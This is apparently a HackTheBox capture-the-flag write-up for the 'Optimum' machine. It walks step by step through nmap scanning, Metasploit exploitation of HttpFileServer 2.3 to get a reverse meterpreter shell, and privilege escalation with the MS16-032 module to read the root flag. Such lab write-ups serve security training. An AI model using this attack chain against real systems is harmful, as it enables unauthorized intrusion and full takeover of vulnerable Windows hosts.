Optimum
Optimum writeup by Thamizhiniyan C S
Last updated
Optimum writeup by Thamizhiniyan C S
Last updated
Greetings everyone,
In this write-up, we will tackle Optimum from HackTheBox.
Machine link: Optimum
Difficulty Level: Easy
Let's Begin 🙌
Firstly, connect to the HTB server using the OpenVPN configuration file generated by HTB. Click Here to learn more about how to connect to VPN and access the boxes.
Once connected to the VPN service, click on "Join Machine" to access the machine's IP.
Upon joining the machine, you will be able to view the IP address of the target machine.
nmap -A -T4 <TARGET>
| Ports | Services | Service Version |
|---|---|---|
80 | HTTP | HttpFileServer httpd 2.3 |
I searched google about the ‘HttpFileServer httpd 2.3’ to find more about it and found that it’s vulnerable to Remote Command Execution.
We found that the service ‘HttpFileServer httpd 2.3’ is vulnerable to Remote Command Injection on the Information Gathering phase. Let’s try to exploit that using Metasploit. Start metasploit using the command ‘msfconsole’. Search for exploits for the service ‘httpfileserver’ using the command ‘search httpfileserver’.
Select the exploit using the command ‘use 0’. Next check the options for the exploit using the command ‘show options’. The required options that we need to modify are RHOSTS ( target IP ) and LHOST ( attacker IP )
We can do that by using the following commands:
set rhosts <Target_IP>
set lhost <HTB_TUN_IP>
Now to perform the exploit, enter the command ‘exploit’ and press enter.
We have successfully exploited the target and got our initial access on the target machine.
Found the user flag in the Desktop Directory.
First I tried the ‘getsystem’ command which executes a ‘meterpreter’ script that tries to escalate privileges, but it failed.
Next I decided to look out for exploits to escalate privileges. For this I used another Metasploit module ‘local_exploit_suggester’. To use that first we have to put the current ‘meterpreter’ session to background using the command ‘background’.
Now select the Metasploit module by using the command ‘use post/multi/recon/local_exploit_suggester’. Check out the required options for the module to run. The required options are SESSION ( id of the ‘meterpreter’ session that we put in background ).
We can find the session id by using the ‘sessions’ command. Use the command ‘set session 1’ to refer to the required session.
We can run the module using the command ‘exploit’.
We can see five possible suggestions by ‘local_exploit_suggester’ out of which, ‘exploit/windows/local/ms16_032_secondary_logon_handle_privesc’ worked. We can use this exploit by using the command ‘use exploit/windows/local/ms16_032_secondary_logon_handle_privesc’. Check out the required options for this exploit to run. The required options are the SESSION ( id of the ‘meterpreter’ session that we put in background ) and the LHOST ( attacker IP ).
We can do that by using the following commands:
set session 1
set lhost <HTB_TUN_IP>
Now execute the exploit using the command ‘exploit’.
We have successfully performed privilege escalation.
I searched for the root.txt using the search command in meterpreter.
Found the root flag at C:\Users\Administrator\Desktop\root.txt.
Thank You...
